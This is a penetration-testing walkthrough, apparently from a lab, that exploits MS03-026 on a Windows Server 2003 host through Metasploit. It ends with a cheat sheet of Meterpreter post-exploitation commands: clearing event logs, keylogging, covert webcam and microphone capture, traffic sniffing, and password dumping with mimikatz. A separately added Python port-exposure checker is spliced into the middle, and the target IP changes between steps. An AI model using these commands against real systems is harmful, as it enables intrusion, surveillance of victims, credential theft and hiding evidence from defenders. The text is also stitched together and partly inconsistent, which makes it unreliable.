Information collection

The IP address of the target machine is 192.168.173.136

Use Nmap to scan its open ports, operating system and other details, which gives us some information about the target system.

OS version: Windows Server 2003

Open ports and services:

21/tcp    ftp
135/tcp   msrpc
139/tcp   netbios-ssn
445/tcp   microsoft-ds
777/tcp   multiling-http
1025/tcp  NFS-or-IIS
1026/tcp  LSA-or-nterm
1029/tcp  ms-lsa
1030/tcp  iad1
6002/tcp  X11:2
7001/tcp  afs3-callback
7002/tcp  afs3-prserver
8099/tcp  unknown

Vulnerability analysis

Port 135 is open on the target host. The service behind it is MSRPC (Microsoft Remote Procedure Call), that is, the Windows RPC service.

This is the service we will try to exploit.
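Before moving on to the exploit, here is a defender-side check (added example, not code from the original post) that parses the scan listing above and explains why this host is exposed; the RPC/SMB port policy and the list of unsupported OS versions are assumptions of the example.

```python
"""Exposure check for the scan result on this page.  Added example, not code
from the original post: the scan line and OS fingerprint are the page's own,
the policy tables below are this example's assumptions."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed from the nmap result quoted on the page (one host).
SCAN_LINE = (
    "21/tcp ftp 135/tcp msrpc 139/tcp netbios-ssn 445/tcp microsoft-ds "
    "777/tcp multiling-http 1025/tcp NFS-or-IIS 1026/tcp LSA-or-nterm "
    "1029/tcp ms-lsa 1030/tcp iad1 6002/tcp X11:2 7001/tcp afs3-callback "
    "7002/tcp afs3-prserver 8099/tcp unknown"
)
TOKEN = re.compile(r"(\d+)/(tcp|udp)\s+(\S+)")

# Assumed policy: RPC/SMB listeners that must not face untrusted networks.
RPC_SMB_PORTS = {
    135: "MSRPC endpoint mapper; the DCOM interface hit by MS03-026",
    139: "NetBIOS session service",
    445: "SMB over TCP",
}
# Assumed list of operating systems that no longer receive security updates.
UNSUPPORTED_OS = {"Windows Server 2003", "Windows XP"}

@dataclass
class Finding:
    severity: str
    port: Optional[int]  # None for a host-level finding
    detail: str

def parse_ports(line: str) -> List[Tuple[int, str, str]]:
    """Turn 'PORT/PROTO SERVICE' tokens into (port, proto, service) tuples."""
    return [(int(p), proto, svc) for p, proto, svc in TOKEN.findall(line)]

def assess(os_name: str, ports: List[Tuple[int, str, str]]) -> List[Finding]:
    """Flag an unsupported OS, then every exposed RPC/SMB listener on it."""
    unsupported = os_name in UNSUPPORTED_OS
    findings = [Finding("critical", None, f"{os_name} is out of support; "
                        "RPC/SMB bugs stay unpatched")] if unsupported else []
    for port, proto, svc in ports:
        if port in RPC_SMB_PORTS:
            # Same exposure, but critical rather than high when the OS cannot be patched.
            sev = "critical" if unsupported else "high"
            findings.append(Finding(sev, port, f"{port}/{proto} ({svc}): "
                            f"{RPC_SMB_PORTS[port]}; restrict to management net or disable"))
    return findings
```

Run against the page's scan, the check reports the unsupported OS plus ports 135, 139 and 445 as critical; the same three ports on a supported Windows release come back as high.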

Exploitation

Start Metasploit on Kali:

root@kali:~# msfconsole

Search for all exploit modules related to Windows RPC (DCOM):

msf5 > search dcom

Use the MS03-026 module:

msf5 > use exploit/windows/dcerpc/ms03_026_dcom

Before running the exploit, list its options and requirements:

msf5 exploit(windows/dcerpc/ms03_026_dcom) > show options

Once the required options are known, set them; here only the target host needs to be set:

msf5 exploit(windows/dcerpc/ms03_026_dcom) > set RHOSTS 192.168.174.136
RHOSTS => 192.168.174.136

With the options set, the next step is to run the exploit:

msf5 exploit(windows/dcerpc/ms03_026_dcom) > exploit

After the exploit runs we have a shell on the target host. We can now run commands to inspect the target, for example its network configuration:

meterpreter > ipconfig

Further post-exploitation steps can be carried out with the other Meterpreter commands listed below.

Common Meterpreter commands

Basic system commands

shell          Enter the target host's CMD shell
reboot         Restart the target host
shutdown       Shut down the target host
sysinfo        Show the target host's system information
background     Put the current session into the background
info           Show information about a module
run            Run an existing module; type run and press TAB to list the available scripts
clearev        Clear the Windows application, system and security event logs
ipconfig       Show network configuration information

Process list

getuid         Show the user ID and computer name
getpid         Show the ID of the current process
kill           Terminate a process
ps             List running processes

Mouse/keyboard operation

keyscan_start          Start a keystroke-recording session
keyscan_stop           Stop the keystroke-recording session
keyscan_dump           Dump the keystrokes captured from the target host
uictl enable mouse     Enable the mouse
uictl disable mouse    Disable the mouse
uictl enable keyboard  Enable the keyboard
uictl disable keyboard Disable the keyboard

Session

enumdesktops   List all accessible desktops and window stations
getdesktop     Show the current Meterpreter desktop
setdesktop     Change the current Meterpreter desktop

Sniffer

use sniffer / load sniffer   Load the sniffer extension
sniffer_interfaces           List the network interfaces
sniffer_start                Start capturing on an interface
sniffer_stats                Show capture statistics for an interface
sniffer_stop                 Stop capturing on an interface
sniffer_dump                 Dump the captured data from the target host to the local host

Camera commands

webcam_list    List all cameras on the system
webcam_snap    Take a photo with the target host's camera
record_mic     Record ambient sound from the host's default microphone
webcam_stream  Stream video from the camera

Remote desktop/Screenshot

enumdesktops   List available desktops
getdesktop     Show the desktop associated with the current Meterpreter session
setdesktop     Set the desktop associated with the Meterpreter session
-h             Show help
screenshot     Take a screenshot; alternatively, load the espia module (use espia) and run screengrab
run vnc        Connect to the remote desktop over VNC

Fetch passwords

load mimikatz                                  Load the mimikatz extension (help lists its commands)
wdigest                                        Retrieve WDigest passwords
mimikatz_command -f samdump::hashes            Run a native mimikatz command
mimikatz_command -f sekurlsa::searchPasswords  Run a native mimikatz command